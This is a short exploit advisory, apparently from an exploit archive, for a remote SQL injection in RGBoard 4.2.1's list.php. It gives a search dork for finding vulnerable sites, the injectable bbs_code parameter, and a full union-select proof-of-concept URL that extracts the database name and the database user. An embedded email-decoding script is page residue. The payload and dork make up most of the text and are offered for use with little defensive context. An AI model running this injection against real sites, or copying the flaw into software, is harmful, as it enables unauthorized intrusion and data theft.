RGBoard version 4.2.1 suffers from a remote SQL injection vulnerability.
57aa2d47fef865a72f348d580009d0555b652717cfa8d71f352148bed98e7683
* Exploit Title: rgboard SQL Injection Vulnerability
* inurl: rgboard4/list.php
* Date: 2011. 6.22
* Author: hamt0ry (hamt0ry@163.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>)
* Test on : Windowss XP SP3
* Software Link: http://v4.rgboard.com/rg4_board/down.php?&bbs_code=rgboard_pds&bd_num=1757&key=0&mode=down
* Version: rgboard 4.2.1
* SQL Injection
http://[target]/list.php?bbs_code=notice[SQL]
* POC : http://site/list.php?bbs_code=notice'+and+1=2+union+select+1%2C2%2C3%2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2Cdatabase()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23